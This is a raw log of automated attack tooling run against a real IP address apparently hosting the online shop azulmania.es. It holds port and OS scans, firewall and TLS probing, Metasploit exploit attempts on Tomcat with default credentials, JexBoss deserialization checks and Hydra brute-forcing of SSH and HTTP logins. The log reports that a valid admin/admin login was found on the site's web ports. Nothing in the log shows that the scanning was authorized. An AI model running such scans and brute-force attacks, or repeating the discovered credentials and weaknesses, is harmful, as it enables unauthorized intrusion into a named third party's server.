  2454. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  2455. Aggressive OS guesses: Linux 2.6.32 (92%), Linux 2.6.32 - 3.1 (92%), Linux 3.10 (92%), Linux 3.2 (92%), Linux 3.4 - 3.10 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 3.11 (90%)
  2456. No exact OS matches for host (test conditions non-ideal).
  2457. Network Distance: 8 hops
  2458.  
  2459. TRACEROUTE (using port 389/tcp)
  2460. HOP RTT ADDRESS
  2461. 1 103.68 ms 10.251.200.1
  2462. 2 103.91 ms 185.94.189.129
  2463. 3 ...
  2464. 4 115.06 ms 94.23.122.146
  2465. 5 ...
  2466. 6 114.01 ms 91.121.131.219
  2467. 7 ...
  2468. 8 113.99 ms 91.121.2.184
  2469. #######################################################################################################################################
  2477.  
  2478. WAFW00F - Web Application Firewall Detection Tool
  2479.  
  2480. By Sandro Gauci && Wendel G. Henrique
  2481.  
  2482. Checking https://91.121.2.184
  2483. The site https://91.121.2.184 is behind a Imperva SecureSphere
  2484. Number of requests: 9
  2485. #######################################################################################################################################
  2486. https://91.121.2.184 [302 Found] Apache, Country[FRANCE][FR], HTTPServer[Apache], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[http://azulmania.es/], X-Powered-By[PHP/5.6.14]
  2487. http://azulmania.es/ [301 Moved Permanently] Country[FRANCE][FR], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[https://azulmania.es/], X-Powered-By[PHP/5.6.14]
  2488. https://azulmania.es/ [302 Found] Apache, Country[FRANCE][FR], HTTPServer[Apache], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[https://azulmania.es/es/], X-Powered-By[PHP/5.6.14]
  2489. https://azulmania.es/es/ [200 OK] Apache, Cookies[PrestaShop-d617857eb8adf9da2917508ed07468ca], Country[FRANCE][FR], Google-Analytics[Universal][UA-31263279-1], HTML5, HTTPServer[Apache], HttpOnly[PrestaShop-d617857eb8adf9da2917508ed07468ca], IP[91.121.2.184], MetaGenerator[PrestaShop], PHP[5.6.14], PrestaShop, Script[text/javascript], Title[Azulmanía - Azulmanía], UncommonHeaders[powered-by], X-Powered-By[PHP/5.6.14]
  2490. #######################################################################################################################################
  2491.  
  2492. AVAILABLE PLUGINS
  2493. -----------------
  2494.  
  2495. PluginSessionResumption
  2496. PluginCertInfo
  2497. PluginOpenSSLCipherSuites
  2498. PluginCompression
  2499. PluginChromeSha1Deprecation
  2500. PluginHSTS
  2501. PluginHeartbleed
  2502. PluginSessionRenegotiation
  2503.  
  2504.  
  2505.  
  2506. CHECKING HOST(S) AVAILABILITY
  2507. -----------------------------
  2508.  
  2509. 91.121.2.184:443 => 91.121.2.184:443
  2510.  
  2511.  
  2512.  
  2513. SCAN RESULTS FOR 91.121.2.184:443 - 91.121.2.184:443
  2514. ----------------------------------------------------
  2515.  
  2516. * Deflate Compression:
  2517. OK - Compression disabled
  2518.  
  2519. * Session Renegotiation:
  2520. Client-initiated Renegotiations: OK - Rejected
  2521. Secure Renegotiation: OK - Supported
  2522.  
  2523. * Certificate - Content:
  2524. SHA1 Fingerprint: b9fb2f963ee488b751d1bc5303f98a1902d98391
  2525. Common Name: azulmania.es
  2526. Issuer: Let's Encrypt Authority X3
  2527. Serial Number: 036C5368A46E57F0DB2D572C1E898A2E1A50
  2528. Not Before: Oct 30 14:38:09 2018 GMT
  2529. Not After: Jan 28 14:38:09 2019 GMT
  2530. Signature Algorithm: sha256WithRSAEncryption
  2531. Public Key Algorithm: rsaEncryption
  2532. Key Size: 2048 bit
  2533. Exponent: 65537 (0x10001)
  2534. X509v3 Subject Alternative Name: {'DNS': ['azulmania.es']}
  2535.  
  2536. * Certificate - Trust:
  2537. Hostname Validation: FAILED - Certificate does NOT match 91.121.2.184
  2538. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
  2539. Java 6 CA Store (Update 65): OK - Certificate is trusted
  2540. Microsoft CA Store (09/2015): OK - Certificate is trusted
  2541. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  2542. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  2543. Certificate Chain Received: ['azulmania.es', 'azulmania.es', "Let's Encrypt Authority X3"]
  2544.  
  2545. * Certificate - OCSP Stapling:
  2546. NOT SUPPORTED - Server did not send back an OCSP response.
  2547.  
  2548. * Session Resumption:
  2549. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  2550. With TLS Session Tickets: OK - Supported
  2551.  
  2552. * SSLV2 Cipher Suites:
  2553. Server rejected all cipher suites.
  2554.  
  2555. * SSLV3 Cipher Suites:
  2556. Server rejected all cipher suites.
  2557.  
  2558.  
  2559.  
  2560. SCAN COMPLETED IN 2.30 S
  2561. ------------------------
  2562. Version: 1.11.12-static
  2563. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  2564.  
  2565. Connected to 91.121.2.184
  2566.  
  2567. Testing SSL server 91.121.2.184 on port 443 using SNI name 91.121.2.184
  2568.  
  2569. TLS Fallback SCSV:
  2570. Server supports TLS Fallback SCSV
  2571.  
  2572. TLS renegotiation:
  2573. Secure session renegotiation supported
  2574.  
  2575. TLS Compression:
  2576. Compression disabled
  2577.  
  2578. Heartbleed:
  2579. TLS 1.2 not vulnerable to heartbleed
  2580. TLS 1.1 not vulnerable to heartbleed
  2581. TLS 1.0 not vulnerable to heartbleed
  2582.  
  2583. Supported Server Cipher(s):
  2584. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  2585. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  2586. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  2587. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  2588. Accepted TLSv1.2 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
  2589. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2590. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2591. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 1024 bits
  2592. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 1024 bits
  2593. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  2594. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
  2595. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 1024 bits
  2596. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 1024 bits
  2597. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  2598. Accepted TLSv1.2 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
  2599. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
  2600. Accepted TLSv1.2 128 bits RC4-SHA
  2601. Preferred TLSv1.1 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
  2602. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2603. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2604. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  2605. Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
  2606. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  2607. Accepted TLSv1.1 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
  2608. Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
  2609. Accepted TLSv1.1 128 bits RC4-SHA
  2610. Preferred TLSv1.0 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
  2611. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2612. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2613. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
  2614. Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
  2615. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
  2616. Accepted TLSv1.0 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
  2617. Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
  2618. Accepted TLSv1.0 128 bits RC4-SHA
  2619.  
  2620. SSL Certificate:
  2621. Signature Algorithm: sha256WithRSAEncryption
  2622. RSA Key Strength: 2048
  2623.  
  2624. Subject: azulmania.es
  2625. Altnames: DNS:azulmania.es
  2626. Issuer: Let's Encrypt Authority X3
  2627.  
  2628. Not valid before: Oct 30 14:38:09 2018 GMT
  2629. Not valid after: Jan 28 14:38:09 2019 GMT
  2630. #######################################################################################################################################
  2638.  
  2639. WAFW00F - Web Application Firewall Detection Tool
  2640.  
  2641. By Sandro Gauci && Wendel G. Henrique
  2642.  
  2643. Checking http://91.121.2.184:8080
  2644.  
  2645. http://91.121.2.184:8080 [ Unassigned]
  2646.  
  2647. Version: 1.11.12-static
  2648. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  2649.  
  2650. Connected to 91.121.2.184
  2651.  
  2652. Testing SSL server 91.121.2.184 on port 8080 using SNI name 91.121.2.184
  2653.  
  2654. TLS Fallback SCSV:
  2655. Server does not support TLS Fallback SCSV
  2656.  
  2657. TLS renegotiation:
  2658. Session renegotiation not supported
  2659.  
  2660. TLS Compression:
  2661. Compression disabled
  2662.  
  2663. Heartbleed:
  2664. TLS 1.2 not vulnerable to heartbleed
  2665. TLS 1.1 not vulnerable to heartbleed
  2666. TLS 1.0 not vulnerable to heartbleed
  2667. #######################################################################################################################################
  2668. RHOSTS => 91.121.2.184
  2669. RHOST => 91.121.2.184
  2670. [-] WAR file not found
  2671. [*] Auxiliary module execution completed
  2672. [*] Scanned 1 of 1 hosts (100% complete)
  2673. [*] Auxiliary module execution completed
  2674. RPORT => 8080
  2675. [*] Scanned 1 of 1 hosts (100% complete)
  2676. [*] Auxiliary module execution completed
  2677. [*] Attempting to connect to 91.121.2.184:8080
  2678. [*] Scanned 1 of 1 hosts (100% complete)
  2679. [*] Auxiliary module execution completed
  2680. [*] http://91.121.2.184:8080/admin/j_security_check - Checking j_security_check...
  2681. [*] Scanned 1 of 1 hosts (100% complete)
  2682. [*] Auxiliary module execution completed
  2683. [*] Scanned 1 of 1 hosts (100% complete)
  2684. [*] Auxiliary module execution completed
  2685. [-] Exploit aborted due to failure: unreachable: The target server did not respond to fingerprinting, use 'set FingerprintCheck false' to disable this check.
  2686. [*] Exploit completed, but no session was created.
  2687. USERNAME => tomcat
  2688. PASSWORD => tomcat
  2689. [-] Exploit aborted due to failure: unreachable: The target server did not respond to fingerprinting, use 'set FingerprintCheck false' to disable this check.
  2690. [*] Exploit completed, but no session was created.
  2691. #######################################################################################################################################
  2692.  
  2693.  
  2694.  
  2695. * --- JexBoss: Jboss verify and EXploitation Tool --- *
  2696. | * And others Java Deserialization Vulnerabilities * |
  2697. | |
  2698. | @author: João Filho Matos Figueiredo |
  2699. | @contact: joaomatosf@gmail.com |
  2700. | |
  2701. | @update: https://github.com/joaomatosf/jexboss |
  2702. #______________________________________________________#
  2703.  
  2704. @version: 1.2.4
  2705.  
  2706. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
  2707.  
  2708.  
  2709. ** Checking Host: http://91.121.2.184:8080 **
  2710.  
  2711. [*] Checking admin-console:
  2712. * An error occurred while connecting to the host http://91.121.2.184:8080 (HTTPConnectionPool(host='91.121.2.184', port=8080): Max retries exceeded with url: /admin-console//github.com/joaomatosf/jexboss (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
  2713.  
  2714. [*] Checking Struts2:
  2715. * An error occurred while connecting to the host http://91.121.2.184:8080 (HTTPConnectionPool(host='91.121.2.184', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
  2716.  
  2717. [*] Checking Servlet Deserialization:
  2718. * An error occurred while connecting to the host http://91.121.2.184:8080 (HTTPConnectionPool(host='91.121.2.184', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
  2719.  
  2720. [*] Checking Application Deserialization:
  2721. * An error occurred while connecting to the host http://91.121.2.184:8080 (HTTPConnectionPool(host='91.121.2.184', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
  2722.  
  2723. [*] Checking Jenkins:
  2724. * An error occurred while connecting to the host http://91.121.2.184:8080 (HTTPConnectionPool(host='91.121.2.184', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
  2725.  
  2726. [*] Checking web-console: [ ERROR ]
  2727. * The server http://91.121.2.184:8080 is not an HTTP server.
  2728.  
  2729.  
  2730.  
  2731. * Results:
  2732. The server is not vulnerable to bugs tested ... :D
  2733.  
  2734. * Info: review, suggestions, updates, etc:
  2735. https://github.com/joaomatosf/jexboss
  2736.  
  2740. #######################################################################################################################################
  2741.  
  2742. I, [2018-11-07T17:28:29.047883 #16209] INFO -- : Initiating port scan
  2743. I, [2018-11-07T17:29:17.069699 #16209] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-07_17-28-29.xml
  2744. I, [2018-11-07T17:29:17.071369 #16209] INFO -- : Discovered open port: 91.121.2.184:80
  2745. I, [2018-11-07T17:29:17.806127 #16209] INFO -- : Discovered open port: 91.121.2.184:443
  2746. I, [2018-11-07T17:29:19.020573 #16209] INFO -- : Discovered open port: 91.121.2.184:465
  2747. I, [2018-11-07T17:29:25.958981 #16209] INFO -- : Discovered open port: 91.121.2.184:993
  2748. I, [2018-11-07T17:29:26.431011 #16209] INFO -- : Discovered open port: 91.121.2.184:60443
  2749. I, [2018-11-07T17:29:27.472535 #16209] INFO -- : <<<Enumerating vulnerable applications>>>
  2750.  
  2751.  
  2752. --------------------------------------------------------
  2753. <<<Yasuo discovered following vulnerable applications>>>
  2754. --------------------------------------------------------
  2755. +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
  2756. | App Name | URL to Application | Potential Exploit | Username | Password |
  2757. +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
  2758. | Plixer Scrutinizer NetFlow | http://91.121.2.184:80/cgi-bin/admin.cgi | ./auxiliary/admin/http/scrutinizer_add_user.rb | | |
  2759. +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
  2760. ######################################################################################################################################
  2761. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:32 EST
  2762. NSE: Loaded 148 scripts for scanning.
  2763. NSE: Script Pre-scanning.
  2764. Initiating NSE at 17:32
  2765. Completed NSE at 17:32, 0.00s elapsed
  2766. Initiating NSE at 17:32
  2767. Completed NSE at 17:32, 0.00s elapsed
  2768. Initiating Parallel DNS resolution of 1 host. at 17:32
  2769. Completed Parallel DNS resolution of 1 host. at 17:32, 16.50s elapsed
  2770. Initiating SYN Stealth Scan at 17:32
  2771. Scanning 91.121.2.184 [474 ports]
  2772. Discovered open port 80/tcp on 91.121.2.184
  2773. Discovered open port 8080/tcp on 91.121.2.184
  2774. Discovered open port 993/tcp on 91.121.2.184
  2775. Discovered open port 443/tcp on 91.121.2.184
  2776. Discovered open port 22/tcp on 91.121.2.184
  2777. Discovered open port 389/tcp on 91.121.2.184
  2778. Discovered open port 465/tcp on 91.121.2.184
  2779. Discovered open port 7071/tcp on 91.121.2.184
  2780. Completed SYN Stealth Scan at 17:32, 4.31s elapsed (474 total ports)
  2781. Initiating Service scan at 17:32
  2782. Scanning 8 services on 91.121.2.184
  2783. Completed Service scan at 17:33, 21.22s elapsed (8 services on 1 host)
  2784. Initiating OS detection (try #1) against 91.121.2.184
  2785. Retrying OS detection (try #2) against 91.121.2.184
  2786. Initiating Traceroute at 17:33
  2787. Completed Traceroute at 17:33, 0.12s elapsed
  2788. Initiating Parallel DNS resolution of 2 hosts. at 17:33
  2789. Completed Parallel DNS resolution of 2 hosts. at 17:33, 16.50s elapsed
  2790. NSE: Script scanning 91.121.2.184.
  2791. Initiating NSE at 17:33
  2792. Completed NSE at 17:36, 182.65s elapsed
  2793. Initiating NSE at 17:36
  2794. Completed NSE at 17:36, 1.13s elapsed
  2795. Nmap scan report for 91.121.2.184
  2796. Host is up (0.11s latency).
  2797. Not shown: 463 filtered ports
  2798. PORT STATE SERVICE VERSION
  2799. 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
  2800. | ssh-hostkey:
  2801. | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
  2802. |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
  2803. 25/tcp closed smtp
  2804. 80/tcp open http Apache httpd (PHP 5.6.14)
  2805. | http-methods:
  2806. |_ Supported Methods: GET HEAD POST OPTIONS
  2807. | http-robots.txt: 83 disallowed entries (15 shown)
  2808. | /*?orderby= /*?orderway= /*?tag= /*?id_currency=
  2809. | /*?search_query= /*?back= /*?n= /*&orderby= /*&orderway= /*&tag=
  2810. | /*&id_currency= /*&search_query= /*&back= /*&n=
  2811. |_/*controller=addresses
  2812. |_http-server-header: Apache
  2813. |_http-title: Did not follow redirect to http://azulmania.es/
  2814. 139/tcp closed netbios-ssn
  2815. 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
  2816. | ssl-cert: Subject: commonName=ks37079.kimsufi.com/organizationName=Zimbra Collaboration Server/stateOrProvinceName=N/A/countryName=US
  2817. | Issuer: commonName=ks37079.kimsufi.com/organizationName=Zimbra Collaboration Server/stateOrProvinceName=N/A/countryName=US
  2818. | Public Key type: rsa
  2819. | Public Key bits: 1024
  2820. | Signature Algorithm: sha1WithRSAEncryption
  2821. | Not valid before: 2013-12-09T09:57:56
  2822. | Not valid after: 2018-12-08T09:57:56
  2823. | MD5: 922f 71f8 2bf1 f953 ff2f 28d6 903f a524
  2824. |_SHA-1: 5aa2 2e6f 9c8b 2556 b75c 87e0 f34a c1ce 2ee3 85a1
  2825. |_ssl-date: TLS randomness does not represent time
  2826. 443/tcp open ssl/http Apache httpd (PHP 5.6.14)
  2827. | http-methods:
  2828. |_ Supported Methods: GET HEAD POST OPTIONS
  2829. | http-robots.txt: 83 disallowed entries (15 shown)
  2830. | /*?orderby= /*?orderway= /*?tag= /*?id_currency=
  2831. | /*?search_query= /*?back= /*?n= /*&orderby= /*&orderway= /*&tag=
  2832. | /*&id_currency= /*&search_query= /*&back= /*&n=
  2833. |_/*controller=addresses
  2834. |_http-server-header: Apache
  2835. |_http-title: Did not follow redirect to http://azulmania.es/
  2836. | ssl-cert: Subject: commonName=azulmania.es
  2837. | Subject Alternative Name: DNS:azulmania.es
  2838. | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
  2839. | Public Key type: rsa
  2840. | Public Key bits: 2048
  2841. | Signature Algorithm: sha256WithRSAEncryption
  2842. | Not valid before: 2018-10-30T14:38:09
  2843. | Not valid after: 2019-01-28T14:38:09
  2844. | MD5: 7cc6 2d40 ca18 f165 624a 7ee8 4560 7a18
  2845. |_SHA-1: b9fb 2f96 3ee4 88b7 51d1 bc53 03f9 8a19 02d9 8391
  2846. |_ssl-date: 2018-11-07T22:33:32+00:00; 0s from scanner time.
  2847. 445/tcp closed microsoft-ds
  2848. 465/tcp open ssl/smtps?
  2849. |_smtp-commands: Couldn't establish connection on port 465
  2850. |_ssl-date: TLS randomness does not represent time
  2851. 993/tcp open ssl/imaps?
  2852. |_ssl-date: TLS randomness does not represent time
  2853. 7071/tcp open ssl/iwg1?
  2854. |_ssl-date: 2018-11-07T22:33:32+00:00; 0s from scanner time.
  2855. 8080/tcp open ssh OpenSSH 5.3 (protocol 2.0)
  2856. | ssh-hostkey:
  2857. | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
  2858. |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
  2859. Device type: general purpose|storage-misc|WAP|broadband router|router|media device
  2860. Running (JUST GUESSING): Linux 2.6.X|3.X (94%), HP embedded (91%), Ubiquiti embedded (90%), MikroTik RouterOS 6.X (89%), Infomir embedded (89%), Netgear RAIDiator 4.X (89%)
  2861. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/h:hp:p2000_g3 cpe:/h:ubnt:airmax_nanostation cpe:/o:mikrotik:routeros:6.19 cpe:/o:linux:linux_kernel:2.6 cpe:/h:infomir:mag-250 cpe:/o:netgear:raidiator:4.2.21
  2862. Aggressive OS guesses: Linux 2.6.32 (94%), Linux 2.6.32 - 3.13 (94%), Linux 2.6.32 - 3.1 (93%), Linux 2.6.32 - 2.6.39 (92%), Linux 2.6.39 (92%), Linux 3.10 (92%), HP P2000 G3 NAS device (91%), Linux 3.2 (91%), Linux 3.11 (91%), Linux 3.5 (91%)
  2863. No exact OS matches for host (test conditions non-ideal).
  2864. Uptime guess: 21.259 days (since Wed Oct 17 12:24:18 2018)
  2865. Network Distance: 2 hops
  2866. TCP Sequence Prediction: Difficulty=254 (Good luck!)
  2867. IP ID Sequence Generation: All zeros
  2868.  
  2869. TRACEROUTE (using port 445/tcp)
  2870. HOP RTT ADDRESS
  2871. 1 107.37 ms 10.251.200.1
  2872. 2 107.15 ms 91.121.2.184
  2873.  
  2874. NSE: Script Post-scanning.
  2875. Initiating NSE at 17:36
  2876. Completed NSE at 17:36, 0.00s elapsed
  2877. Initiating NSE at 17:36
  2878. Completed NSE at 17:36, 0.00s elapsed
  2879. Read data files from: /usr/bin/../share/nmap
  2880. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2881. Nmap done: 1 IP address (1 host up) scanned in 247.95 seconds
  2882. Raw packets sent: 1030 (49.474KB) | Rcvd: 3347 (2.272MB)
  2883. #######################################################################################################################################
  2884. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:36 EST
  2885. NSE: Loaded 148 scripts for scanning.
  2886. NSE: Script Pre-scanning.
  2887. Initiating NSE at 17:36
  2888. Completed NSE at 17:36, 0.00s elapsed
  2889. Initiating NSE at 17:36
  2890. Completed NSE at 17:36, 0.00s elapsed
  2891. Initiating Parallel DNS resolution of 1 host. at 17:36
  2892. Completed Parallel DNS resolution of 1 host. at 17:36, 16.50s elapsed
  2893. Initiating UDP Scan at 17:36
  2894. Scanning 91.121.2.184 [14 ports]
  2895. Completed UDP Scan at 17:36, 2.80s elapsed (14 total ports)
  2896. Initiating Service scan at 17:36
  2897. Scanning 12 services on 91.121.2.184
  2898. Service scan Timing: About 8.33% done; ETC: 17:56 (0:17:58 remaining)
  2899. Completed Service scan at 17:38, 102.58s elapsed (12 services on 1 host)
  2900. Initiating OS detection (try #1) against 91.121.2.184
  2901. Retrying OS detection (try #2) against 91.121.2.184
  2902. Initiating Traceroute at 17:38
  2903. Completed Traceroute at 17:38, 7.16s elapsed
  2904. Initiating Parallel DNS resolution of 1 host. at 17:38
  2905. Completed Parallel DNS resolution of 1 host. at 17:39, 16.50s elapsed
  2906. NSE: Script scanning 91.121.2.184.
  2907. Initiating NSE at 17:39
  2908. Completed NSE at 17:39, 20.36s elapsed
  2909. Initiating NSE at 17:39
  2910. Completed NSE at 17:39, 1.03s elapsed
  2911. Nmap scan report for 91.121.2.184
  2912. Host is up (0.11s latency).
  2913.  
  2914. PORT STATE SERVICE VERSION
  2915. 53/udp open|filtered domain
  2916. 67/udp open|filtered dhcps
  2917. 68/udp open|filtered dhcpc
  2918. 69/udp open|filtered tftp
  2919. 88/udp open|filtered kerberos-sec
  2920. 123/udp open|filtered ntp
  2921. 137/udp filtered netbios-ns
  2922. 138/udp filtered netbios-dgm
  2923. 139/udp open|filtered netbios-ssn
  2924. 161/udp open|filtered snmp
  2925. 162/udp open|filtered snmptrap
  2926. 389/udp open|filtered ldap
  2927. 520/udp open|filtered route
  2928. 2049/udp open|filtered nfs
  2929. Too many fingerprints match this host to give specific OS details
  2930.  
  2931. TRACEROUTE (using port 137/udp)
  2932. HOP RTT ADDRESS
  2933. 1 104.87 ms 10.251.200.1
  2934. 2 ... 3
  2935. 4 103.93 ms 10.251.200.1
  2936. 5 105.82 ms 10.251.200.1
  2937. 6 105.80 ms 10.251.200.1
  2938. 7 105.65 ms 10.251.200.1
  2939. 8 105.65 ms 10.251.200.1
  2940. 9 105.65 ms 10.251.200.1
  2941. 10 105.65 ms 10.251.200.1
  2942. 11 ... 18
  2943. 19 102.58 ms 10.251.200.1
  2944. 20 105.38 ms 10.251.200.1
  2945. 21 ... 28
  2946. 29 105.02 ms 10.251.200.1
  2947. 30 107.64 ms 10.251.200.1
  2948.  
  2949. NSE: Script Post-scanning.
  2950. Initiating NSE at 17:39
  2951. Completed NSE at 17:39, 0.00s elapsed
  2952. Initiating NSE at 17:39
  2953. Completed NSE at 17:39, 0.00s elapsed
  2954. Read data files from: /usr/bin/../share/nmap
  2955. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2956. Nmap done: 1 IP address (1 host up) scanned in 170.80 seconds
  2957. Raw packets sent: 135 (11.658KB) | Rcvd: 5455 (1.759MB)
  2958. #######################################################################################################################################
  2965.  
  2966. + -- --=[BruteX v1.7 by 1N3
  2967. + -- --=[http://crowdshield.com
  2968.  
  2969.  
  2970. ###################################################################################### Running Port Scan ##############################
  2971. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:39 EST
  2972. Nmap scan report for 91.121.2.184
  2973. Host is up (0.11s latency).
  2974. Not shown: 17 filtered ports, 3 closed ports
  2975. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  2976. PORT STATE SERVICE
  2977. 22/tcp open ssh
  2978. 80/tcp open http
  2979. 389/tcp open ldap
  2980. 443/tcp open https
  2981. 993/tcp open imaps
  2982. 8080/tcp open http-proxy
  2983.  
  2984. Nmap done: 1 IP address (1 host up) scanned in 18.20 seconds
  2985.  
  2986. ################################### Running Brute Force ###############################################################################
  2987.  
  2988. + -- --=[Port 21 closed... skipping.
  2989. + -- --=[Port 22 opened... running tests...
  2990. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2991.  
  2992. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:44
  2993. [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
  2994. [DATA] attacking ssh://91.121.2.184:22/
  2995. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2996.  
  2997. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:48
  2998. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  2999. [DATA] attacking ssh://91.121.2.184:22/
  3000. + -- --=[Port 23 closed... skipping.
  3001. + -- --=[Port 25 closed... skipping.
  3002. + -- --=[Port 80 opened... running tests...
  3003. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3004.  
  3005. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:52
  3006. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  3007. [DATA] attacking http-get://91.121.2.184:80//
  3008. [80][http-get] host: 91.121.2.184 login: admin password: admin
  3009. [STATUS] attack finished for 91.121.2.184 (valid pair found)
  3010. 1 of 1 target successfully completed, 1 valid password found
  3011. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 17:39:53
  3012. + -- --=[Port 110 closed... skipping.
  3013. + -- --=[Port 139 closed... skipping.
  3014. + -- --=[Port 162 closed... skipping.
  3015. + -- --=[Port 389 opened... running tests...
  3016. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3017.  
  3018. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:53
  3019. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3020.  
  3021. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:53
  3022. + -- --=[Port 443 opened... running tests...
  3023. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  3024.  
  3025. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:39:53
  3026. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  3027. [DATA] attacking http-gets://91.121.2.184:443//
  3028. [443][http-get] host: 91.121.2.184 login: admin password: admin
  3029. [STATUS] attack finished for 91.121.2.184 (valid pair found)
  3030. 1 of 1 target successfully completed, 1 valid password found
  3031. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-07 17:39:54
  3032. + -- --=[Port 445 closed... skipping.
  3033. + -- --=[Port 512 closed... skipping.
  3034. + -- --=[Port 513 closed... skipping.
